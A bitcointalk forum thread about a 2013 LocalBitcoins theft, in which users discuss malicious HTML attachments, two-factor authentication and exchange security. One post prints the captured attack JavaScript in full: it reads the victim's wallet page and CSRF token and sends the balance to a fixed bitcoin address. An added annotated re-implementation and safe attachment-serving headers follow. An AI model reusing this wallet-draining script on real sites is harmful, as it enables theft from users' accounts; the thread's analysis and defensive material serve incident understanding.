Topic: LocalBitcoins.com exploit! (Read 6082 times)

hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
September 14, 2013, 09:58:31 PM
#60
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Did you mean because I linked to the forum in the OP? No, that link was safe. Or what do you think of me? (angry)

The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
Ten days ago I was browsing through the LBC site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.
legendary
Activity: 1764
Merit: 1007
September 14, 2013, 06:22:58 PM
#59
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Did you mean because I linked to the forum in the OP? No, that link was safe. Or what do you think of me? (angry)

The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.
hero member
Activity: 767
Merit: 500
September 14, 2013, 06:21:22 PM
#58
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will
hero member
Activity: 756
Merit: 501
There is more to Bitcoin than bitcoins.
September 14, 2013, 02:46:59 PM
#57
Can someone clarify: simply visiting a forum page was enough, or opening an attachment?
jr. member
Activity: 121
Merit: 1
The World’s First Blockchain Core
September 14, 2013, 01:10:08 PM
#56
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdraw confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.

Looks like the exploit just sucked out people's BTC, through a loophole, even if they had 2FA.
legendary
Activity: 1988
Merit: 1012
Beyond Imagination
September 14, 2013, 08:15:56 AM
#55
At least an email-based 2FA is much better.
legendary
Activity: 1190
Merit: 1001
September 14, 2013, 07:22:17 AM
#54
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdraw confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.
hero member
Activity: 882
Merit: 501
Ching-Chang;Ding-Dong
September 14, 2013, 04:51:22 AM
#53
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdraw confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.
legendary
Activity: 1400
Merit: 1013
September 13, 2013, 11:40:39 PM
#52
AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
legendary
Activity: 2492
Merit: 1473
LEALANA Bitcoin Grim Reaper
September 13, 2013, 11:37:02 PM
#51
As the saying goes:

Those who fail to learn from history are doomed to repeat it.


hero member
Activity: 882
Merit: 501
Ching-Chang;Ding-Dong
September 13, 2013, 02:26:24 PM
#50
You can make 2FA work with different SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if you're dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins' behalf in paying out of their pocket for all the stolen coins.
legendary
Activity: 924
Merit: 1132
September 13, 2013, 11:29:35 AM
#49
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I trust a company more than the average private seller... How did you buy your bitcoins, sir?

Some I bought from Bitstamp. And moved them the instant they showed up in the Bitstamp account, to my private wallet.

Some I got for pay - made machine parts for someone. She wanted to pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody who wanted special exclusive super-secret software to analyze an enormous big pile of data, paid in Bitcoin to keep it private from someone else looking at the bank account.

Some others I got for pay - Main job, security consulting. I look at malware, see what it does by reading machine code, figure out how to clean infected machines. Clients implement, or I implement, cleaning software, clients then sell. Pays well. Twice now I asked to be paid in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from a speculator who got nervous back when the price was USD$60.

legendary
Activity: 1988
Merit: 1012
Beyond Imagination
September 13, 2013, 11:04:20 AM
#48
Bitcoin withdrawals should be authenticated through email.

With 2FA I think it is enough.

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different SIM card.
legendary
Activity: 1190
Merit: 1001
September 13, 2013, 11:02:44 AM
#47
Bitcoin withdrawals should be authenticated through email.

With 2FA I think it is enough.
legendary
Activity: 1988
Merit: 1012
Beyond Imagination
September 13, 2013, 10:56:34 AM
#46
Bitcoin withdrawals should be authenticated through email.
hero member
Activity: 756
Merit: 522
September 13, 2013, 10:54:57 AM
#45
My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Don't write code; go to your local bank, ask for an internship and learn how money works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.
sr. member
Activity: 350
Merit: 250
September 13, 2013, 10:50:44 AM
#44
Did you personally lose anything?
legendary
Activity: 1764
Merit: 1007
September 13, 2013, 10:23:07 AM
#43
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for either buyer or seller. All that's required is that the seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.
legendary
Activity: 1526
Merit: 1129
September 13, 2013, 10:18:13 AM
#42
Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.
legendary
Activity: 980
Merit: 1008
September 13, 2013, 08:43:32 AM
#41
This is the exploit in question:

Code:
function loadpic() {
    // Fetch the victim's own wallet page. The attachment is rendered inside
    // the site's origin, so the browser sends the victim's session cookie
    // with this request automatically.
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    // Submit the wallet's own "send" form, field for field, using the CSRF
    // token harvested from the page above.
    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    // Parse the wallet HTML: give up if the page asks for a 2FA code,
    // otherwise pull out the CSRF token and balance and drain the wallet.
    function walh(html) {
        var hastfa = '';      // declared but never used in the captured sample
        var csrftoken = '';
        var btc = 0;
        // A <label for="id_token"> on the page means a one-time code is
        // required to withdraw; the script cannot supply one, so it stops.
        // This is why accounts with 2FA on withdrawals were not drained.
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        // Django-style CSRF token, read straight out of the same-origin
        // response. A token the attacker's script can read is no defence.
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        // Balance as displayed on the page, e.g. "Wallet: 1.2345 BTC".
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);     // now a string; the comparison below coerces it back
        if (btc < 0.02) {
            return;               // too little to bother with
        }
        btc = btc - 0.01;         // subtract 0.01 BTC, presumably to cover the fee
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051
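The script above is small enough to reason about end to end, and two things in it are worth pinning down with running code: the CSRF token did nothing because the attacker's HTML ran in the site's own origin, and the only thing that made the script stop was the 2FA field on the withdrawal form. The following is an added example written for this page, not code from the thread or from LocalBitcoins. `planTheft()` re-implements the decision logic of `walh()` as a pure function so it can be run offline against sample HTML; `attachmentHeaders()` shows the response headers that stop an uploaded `.html` attachment from being rendered as a page in the application's origin at all. The wallet-page markup is constructed for the example (the real page is only known through the regexes in the captured script), and both function names and the drain address are the example's own.

```javascript
// Added example, not from the original thread. Constructed wallet page whose
// markup is an assumption shaped to match the regexes in the captured script.
const WALLET_PAGE_NO_2FA = `
<h2>Wallet: 1.2345 BTC</h2>
<form method="post" action="/accounts/wallet/">
  <input type="hidden" name="csrfmiddlewaretoken" value="Ab12cd34_-xyz">
  <input name="address_to"><input name="amount">
  <input type="submit" name="send_submit" value="Send from wallet">
</form>`;

// Same page for an account with 2FA on withdrawals: the form carries a
// one-time-code field, which the script detects via <label for="id_token">.
const WALLET_PAGE_2FA = WALLET_PAGE_NO_2FA.replace(
  '<input name="address_to">',
  '<label for="id_token">Two-factor code</label><input id="id_token" name="token">' +
  '<input name="address_to">');

// Decision logic of walh() from the captured script, returning the POST body
// it would submit, or null wherever the script returns without sending.
function planTheft(html, drainTo) {
  // 2FA field on the page: the script cannot supply a code, so it gives up.
  if (/label for=.(id_token)/.test(html)) return null;
  // CSRF token harvested from the same-origin response. Because the attacker's
  // HTML runs in the site's origin, the token is readable and protects nothing.
  const csrf = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
  if (!csrf) return null;
  const bal = html.match(/Wallet: ([0-9,.-]+) BTC/);
  if (!bal) return null;
  // Keep the script's own arithmetic, string coercions included.
  let btc = parseFloat(bal[1]).toFixed(2);
  if (btc < 0.02) return null;
  const amount = (btc - 0.01).toFixed(2);
  return {
    csrfmiddlewaretoken: csrf[1],
    address_to: drainTo,
    amount: amount,
    send_submit: 'Send from wallet',
  };
}

// Response headers for serving a user-uploaded attachment so the browser
// downloads it rather than rendering it as a document in the application's
// origin. Function name and policy are the example's own, not the site's.
function attachmentHeaders(originalName) {
  const safeName = originalName.replace(/[^A-Za-z0-9._-]/g, '_');
  return {
    'Content-Type': 'application/octet-stream',                    // never text/html
    'X-Content-Type-Options': 'nosniff',                           // no sniffing back to HTML
    'Content-Disposition': `attachment; filename="${safeName}"`,   // download, do not render
    'Content-Security-Policy': "sandbox; default-src 'none'",      // if rendered anyway: no script, opaque origin
    'Cache-Control': 'no-store',
  };
}

// Stand-alone demonstration (constructed drain address, not a real one).
if (typeof require !== 'undefined' && require.main === module) {
  const drain = '1ExampleDrainAddressNotRealXXXXXXX';
  console.log(planTheft(WALLET_PAGE_NO_2FA, drain)); // POST body with amount "1.22"
  console.log(planTheft(WALLET_PAGE_2FA, drain));    // null: the 2FA field stops it
  console.log(attachmentHeaders('invoice<script>.html'));
}
```

The headers are the second line of defence; the first is not serving user uploads from the application's origin at all (a separate, cookie-less download host), which takes the same-origin session and CSRF token out of the attacker's reach regardless of how the browser treats the file. The `planTheft()` comparison makes the thread's other point concrete: a CSRF token only helps against requests forged from another origin, while a withdrawal-time second factor holds up even when the attacker's code runs inside the victim's session.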